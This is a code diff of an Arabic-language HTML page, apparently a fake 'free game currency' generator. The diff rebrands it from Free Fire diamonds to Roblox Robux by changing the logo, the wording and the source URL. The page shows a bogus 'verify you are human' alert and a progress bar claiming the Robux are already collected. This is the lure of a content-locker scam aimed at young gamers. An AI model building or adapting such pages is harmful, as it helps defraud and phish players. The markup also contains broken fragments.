--- a/deep.html
+++ b/deep.html
@@ -1,5 +1,5 @@
 <!DOCTYPE html>
-<!-- saved from url=(0028)http://buysf.rf.gd/deep.html -->
+<!-- saved from url=(0028)https://hj7r.github.io/srt/ -->
 <html data-bs-theme="light" lang="en" style="font-family: Cairo, sans-serif;"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
     
     <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
@@ -20,16 +20,16 @@
 
 <body>
     <div class="d-flex flex-column justify-content-center" id="login-box">
-        <div class="login-box-header"><img class="tada animated" src="./deep_files/logoo.png" style="width: 158px;font-weight: bold;" width="158" height="118">
+        <div class="login-box-header"><img class="tada animated" src="roblox.png" style="width: 158px;font-weight: bold;" width="158" height="118">
             <h4 style="color: var(--bs-form-valid-border-color);margin: 14px;margin-bottom: 0px;font-weight: 400;font-size: 27px;font-family: Cairo, sans-serif;border-color: rgb(93,180,27);">شحن فري فاير</h4>
         </div>
         <div class="email-login" style="background-color: #ffffff;text-align: center;"><small class="form-text text-center" style="font-family: Cairo, sans-serif;color: rgba(41,48,59,0.24);"></small>
-            <div class="alert alert-danger text-center" role="alert"><span style="font-family: Cairo, sans-serif;">خطأ! يجب علينا التحقق من أنك إنسان ولست روبوت إضغط على زر التحقق لكي تبدأ عملية ارسال الجواهر الي حسابك</span></div>
+            <div class="alert alert-danger text-center" role="alert"><span style="font-family: Cairo, sans-serif;">خطأ! يجب علينا التحقق من أنك إنسان ولست روبوت إضغط على زر التحقق لكي تبدأ عملية ارسال الروبوكس الي حسابك</span></div>
             <div class="container text-center" style="border-radius: 5px;border-color: var(--bs-secondary-bg);color: var(--bs-secondary-color);"> <style="width: 34px;"=""><span class="text-start counter" akhi="30000" style="font-family: Cairo, sans-serif;font-size: 20px;color: var(--bs-body-color);"></span><small class="form-text" style="font-family: Cairo, sans-serif;font-weight: bold;font-size: 20px;color: var(--bs-body-color);"></small></style="width:></div>
             <div class="steps-progressbar" style="font-family: Cairo, sans-serif;">
                 <ul class="list-inline font-monospace">
                     <li class="list-inline-item previous" style="font-family: Cairo, sans-serif;">تم التحقق من الايدي</li>
-                    <li class="list-inline-item active" style="font-family: Cairo, sans-serif;">تم تحصيل الجواهر</li>
+                    <li class="list-inline-item active" style="font-family: Cairo, sans-serif;">تم تحصيل الروبوكس</li>
                     <li class="list-inline-item" style="font-family: Cairo, sans-serif;">الخطوة الاخير تحقق</li>
                 </ul>
             </div>
